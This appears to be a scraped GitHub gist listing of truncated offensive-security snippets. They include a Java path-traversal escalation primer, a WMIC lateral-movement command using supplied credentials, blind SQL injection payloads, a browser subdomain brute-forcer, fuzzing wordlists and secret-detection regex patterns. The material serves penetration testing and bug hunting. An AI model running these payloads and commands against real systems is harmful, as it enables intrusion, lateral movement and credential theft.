Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
Matthew Linney Taius
harisec
/ exploit_path_traversals_in_Java_webapps.txt
Created
April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| so, you can read WEB-INF/web.xml. how can you escalate this issue? | |
| [step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. | |
| use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan): | |
| https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt | |
| with time you can build your own wordlist adding files you've discovered over time. | |
| use Burp Intruder for this, it's perfect for this job. | |
| sort Intruder results by status code so you can see instantly which files were found. |
nickpopovich
/ random_user-agent.py
Created
January 1, 2020 21:04
Script that goes with Python Scripter Burp Extension - every request passed through burp has a random User-Agent. Inspired by Marcin Wielgoszewski (@marcin) https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52583. Also inspired by Tim Tomes' (@lanmaster53) example scripts for Python Scripter https://gist.github.com/lanmaster53/3d86836…
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| header_names = ['User-Agent'] | |
| ua = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0; CAM-L21 Build/HUAWEICAM-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'] | |
| if (messageIsRequest): | |
| request = helpers.analyzeRequest(messageInfo) | |
| headers = request.getHeaders() | |
| for header_name in header_names: |
G0ldenGunSec
/ wmicLateralMovement.txt
Created
December 11, 2019 14:55
WMIC Service Modification for Lateral Movement
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| DEFAULTNMAPOPTIONS="-T4 -sV -Pn --top-ports 5000 -R" | |
| NMAPOPTIONS="$DEFAULTNMAPOPTIONS" | |
| die() { | |
| printf '\033[38;5;9m%s\033[0m\n\n' "$1" >&2 | |
| display_usage | |
| exit 1 | |
| } |
yassineaboukir
/ List of API endpoints & objects
Last active
September 24, 2025 15:54
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Developer: Marzavec ( https://github.com/marzavec ) | |
| Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done. | |
| Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz. | |
| */ | |
| const rootTld = 'lyka.pro'; // change to your target's root tld | |
| // url to newline seperated wordlist | |
| const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt'; |
righettod
/ payloads.txt
Last active
February 10, 2024 12:22
Payloads to try to discover blind SQLi when no error is returned.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # The situation is the following: | |
| # Your enter ab in a feature and it return data to you but when your enter ab' it indicate that there is not data found. | |
| # | |
| # So, does it means that there is no SQLi because ab' is well handled OR the error is catched | |
| # and a "not data found message" is returned? | |
| # | |
| # The goal here is to submit a payload that, if interpreted by the SQL DB, will give ab and then data will be returned | |
| # then indicating that there is a SQLi because the payload is interpreted. | |
| ab';# | |
| ab';-- |
pascalschulz
/ getGithubRepoCloneUrls.py
Last active
November 12, 2020 13:42
This code snippet takes a Github organization name as input, crawls for all its public repositories and returns a list of all the "Git clone URLs" for those repos.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| import re | |
| import requests as rq | |
| # Your Github organization (e.g. /Github) | |
| organization = "/<company_name>" | |
| response = rq.request("GET", "https://github.com{0}".format(organization)) | |
| try: |
tehryanx
/ trufflehog.json
Last active
June 3, 2022 08:26
High signal patterns from trufflehog refactored to work with tomnomnom's gf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "flags": "-HnriE", | |
| "patterns": [ | |
| "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", | |
| "-----BEGIN RSA PRIVATE KEY-----", | |
| "-----BEGIN DSA PRIVATE KEY-----", | |
| "-----BEGIN EC PRIVATE KEY-----", | |
| "-----BEGIN PGP PRIVATE KEY BLOCK-----", | |
| "AKIA[0-9A-Z]{16}", | |
| "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", |